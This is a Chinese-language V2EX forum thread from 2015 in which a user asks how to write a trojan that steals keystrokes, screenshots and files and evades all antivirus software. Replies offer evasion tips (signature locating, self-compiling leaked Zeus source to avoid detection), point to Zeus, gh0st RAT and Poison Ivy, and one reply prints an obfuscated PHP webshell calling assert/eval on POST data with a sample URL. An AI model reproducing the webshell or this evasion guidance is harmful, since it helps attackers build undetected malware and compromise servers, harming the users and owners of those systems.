这里有人写过木马么?

2015-04-19 10:17:07 +08:00
 eeeeeeve

表示从来没有用过木马,也不知道木马长什么样子

电脑木马是用来偷按键,截屏,还可以偷文件么?
想写个木马,这里有人写过么,指点下本菜鸟吧:)

如何写免杀木马呢?可以被国内外所有杀软免杀,做到这点很难么?

7689 次点击
所在节点    程序员
48 条回复
jacob
2015-04-20 00:55:04 +08:00
@evilddog 看不懂呢,函数参数是函数名的兄弟?、、
fork3rt
2015-04-20 09:21:27 +08:00
以前做过免杀, 好多年前了。有源代码免杀和汇编免杀。。 可以通过multccl来进行特征码定位。。
xiaoxiaoleo
2015-04-20 10:47:46 +08:00
去看雪问问~
ChiChou
2015-04-20 15:13:46 +08:00
@bugeye 现在是个杀软都带启发式检测……
pany
2015-04-20 15:23:58 +08:00
@evilddog
这个其实不算。只有在Register Globals为ON的情况下
url.com/test.php?_=assert&__=eval($_POST[hi]) 才能使用
Register Globals已自 PHP 5.3.0 起废弃并将自 PHP 5.4.0 起移除。

完整的是

<?php
$_="";
$_[+""]='';
$_="$_"."";
$_=($_[+""]|" ").($_[+""]|"").($_[+""]^" ");
?>
<?php ${'_'.$_}['_'](${'_'.$_}['__']);?>
hydrazt
2015-04-20 21:07:58 +08:00
直接下载Zeus的源代码吧,你说的都支持了
不过之前泄漏出来的代码是32位的,64位系统上只能以单进程跑。
需要修改了一下代码,才能让64位系统也能注入dll和注入进程。
hydrazt
2015-04-20 21:09:12 +08:00
自己编译的zeus免杀的,用金山杀不出来。。
doublleft
2015-04-27 18:15:37 +08:00
gh0st rat 3.5 很经典的开源远控,后期有不少作品都是基于gh0st制作的

还有一个牛逼的,Poison Ivy,生成 shellcode 自己封成PE

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/184688

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX